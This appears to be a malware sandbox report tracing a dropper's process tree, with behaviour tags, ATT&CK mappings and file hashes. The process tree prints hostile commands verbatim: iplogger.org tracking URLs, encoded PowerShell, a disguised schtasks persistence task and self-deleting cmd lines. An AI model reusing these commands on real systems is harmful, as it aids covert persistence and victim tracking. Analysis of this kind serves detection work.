"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
3⤵
PID:5792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
3⤵
PID:1276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4560 /prefetch:8
3⤵
PID:1524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
3⤵
PID:6400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:1
3⤵
PID:6868

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8756 /prefetch:8
3⤵
PID:2116

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8756 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3996

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:1196

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff719345460,0x7ff719345470,0x7ff719345480
4⤵
PID:3752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9044 /prefetch:8
3⤵
PID:6208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9128 /prefetch:8
3⤵
PID:1788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4684 /prefetch:2
3⤵
PID:5436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:8
3⤵
PID:3964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AAmX4
2⤵
- Suspicious use of WriteProcessMemory
PID:4184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
3⤵
PID:544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,9454851285350408124,15563941409835855135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,9454851285350408124,15563941409835855135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
3⤵
PID:4872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AFmX4
2⤵
- Suspicious use of WriteProcessMemory
PID:524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
3⤵
PID:3480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,753062754459027304,1047318506106147260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,753062754459027304,1047318506106147260,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
3⤵
PID:2016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AJmX4
2⤵
- Suspicious use of WriteProcessMemory
PID:224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
3⤵
PID:3768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,7447738833616876825,6673263424875866618,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
3⤵
PID:5564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,7447738833616876825,6673263424875866618,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AGmX4
2⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,9188804303296016598,13670502316978353561,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
3⤵
PID:5828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,9188804303296016598,13670502316978353561,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AZmX4
2⤵
- Suspicious use of WriteProcessMemory
PID:824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
3⤵
PID:3900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,17716210655439784083,14776183776045738379,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:2
3⤵
PID:5380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,17716210655439784083,14776183776045738379,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AKmX4
2⤵
- Suspicious use of WriteProcessMemory
PID:1376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
3⤵
PID:2012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1718900572709093083,12713038681761641053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AVmX4
2⤵
- Suspicious use of WriteProcessMemory
PID:3568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
3⤵
PID:1156

C:\Program Files (x86)\Company\NewProduct\F0geI.exe
"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 1488
3⤵
- Program crash
PID:1096

C:\Program Files (x86)\Company\NewProduct\real.exe
"C:\Program Files (x86)\Company\NewProduct\real.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3416

C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448

C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
2⤵
- Executes dropped EXE
PID:5004

C:\Program Files (x86)\Company\NewProduct\safert44.exe
"C:\Program Files (x86)\Company\NewProduct\safert44.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5228

C:\Program Files (x86)\Company\NewProduct\jshainx.exe
"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5852

C:\Program Files (x86)\Company\NewProduct\brokerius.exe
"C:\Program Files (x86)\Company\NewProduct\brokerius.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
3⤵
PID:816

C:\Windows\SysWOW64\taskkill.exe
taskkill /im brokerius.exe /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6888

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:6312

C:\Program Files (x86)\Company\NewProduct\captain09876.exe
"C:\Program Files (x86)\Company\NewProduct\captain09876.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6976

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Users\Admin\AppData\Local\Temp\Alwgckdftdslvwbqpdbjc13t.exe
"C:\Users\Admin\AppData\Local\Temp\Alwgckdftdslvwbqpdbjc13t.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Users\Admin\AppData\Local\Temp\Alwgckdftdslvwbqpdbjc13t.exe
C:\Users\Admin\AppData\Local\Temp\Alwgckdftdslvwbqpdbjc13t.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:6696

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4832

C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
"C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:7136

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\TypeRes\DllResource.exe"
3⤵
- Creates scheduled task(s)
PID:5192

C:\Users\Admin\TypeRes\DllResource.exe
"C:\Users\Admin\TypeRes\DllResource.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"
3⤵
PID:6932

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:5936

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:2540

C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe
"C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5268

C:\Program Files (x86)\Company\NewProduct\me.exe
"C:\Program Files (x86)\Company\NewProduct\me.exe"
2⤵
- Executes dropped EXE
PID:5968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
1⤵
PID:4092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6268

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2128 -ip 2128
1⤵
PID:3212

C:\Users\Admin\AppData\Local\Temp\D608.exe
C:\Users\Admin\AppData\Local\Temp\D608.exe
1⤵
- Executes dropped EXE
PID:5980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
2⤵
PID:5752

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 876
2⤵
- Program crash
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5552 -ip 5552
1⤵
PID:6292

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2252

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Company\NewProduct\F0geI.exe
Filesize
339KB

MD5
501e0f6fa90340e3d7ff26f276cd582e

SHA1
1bce4a6153f71719e786f8f612fbfcd23d3e130a

SHA256
f07d918c6571f11abf9ab7268ac6e2ecbcd931c3d9d878895c777d15052aae2b

SHA512
dee3aabfca7912f15b628253222cfe8d8e13cd64f0438e8d705b68b0a14b4c9523b7a207583be7b424e444d6b05f237484a0c38bf2e075d347ef937d409a3a69

Download Submit
C:\Program Files (x86)\Company\NewProduct\F0geI.exe
Filesize
339KB

MD5
501e0f6fa90340e3d7ff26f276cd582e

SHA1
1bce4a6153f71719e786f8f612fbfcd23d3e130a

SHA256
f07d918c6571f11abf9ab7268ac6e2ecbcd931c3d9d878895c777d15052aae2b

SHA512
dee3aabfca7912f15b628253222cfe8d8e13cd64f0438e8d705b68b0a14b4c9523b7a207583be7b424e444d6b05f237484a0c38bf2e075d347ef937d409a3a69

Download Submit
C:\Program Files (x86)\Company\NewProduct\brokerius.exe
Filesize
283KB

MD5
f5d13e361f8b9aca7103cb46b441034b

SHA1
090dcc68f4ce59d1c5b8b7424508c4033ee418dd

SHA256
a5ad514ed54f1f8f0a8e054b0dc3a39d13d70e388711ddb9d44095a5a89317bf

SHA512
db8f615405c3dcbb2e525903a572e13565f184bc8c1a2674138a84774dd06041a9899006b8599a25f06ce4fba92c12d102772e74be62ac6d02b5bc0ac4ee124a

Download Submit
C:\Program Files (x86)\Company\NewProduct\brokerius.exe
Filesize
283KB

MD5
f5d13e361f8b9aca7103cb46b441034b

SHA1
090dcc68f4ce59d1c5b8b7424508c4033ee418dd

SHA256
a5ad514ed54f1f8f0a8e054b0dc3a39d13d70e388711ddb9d44095a5a89317bf

SHA512
db8f615405c3dcbb2e525903a572e13565f184bc8c1a2674138a84774dd06041a9899006b8599a25f06ce4fba92c12d102772e74be62ac6d02b5bc0ac4ee124a

Download Submit
C:\Program Files (x86)\Company\NewProduct\captain09876.exe
Filesize
704KB

MD5
